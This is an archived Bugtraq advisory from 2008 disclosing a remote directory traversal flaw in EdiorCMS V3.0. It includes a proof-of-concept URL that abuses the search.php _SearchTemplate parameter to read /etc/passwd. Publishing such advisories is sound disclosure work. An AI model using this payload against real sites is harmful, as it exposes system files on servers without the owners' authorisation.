Bugtraq mailing list archives

Directory traversal in EdiorCMS V3.0

From: wsn1983 () gmail com
Date: 13 Mar 2008 05:48:56 -0000

Directory traversal in EdiorCMS V3.0 

Application:  EdiorCMS V3.0
Vendor:       http://www.edior.com      
Versions:     3.0
Platforms:    ALL
Bug:          Directory traversal
Exploitation: remote
Date:         13 Mar 2008
Author:       Shennan Wang
              e-mail: wsn1983 () gmail com
POC:          
http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd

Current thread:

Directory traversal in EdiorCMS V3.0 wsn1983 (Mar 13)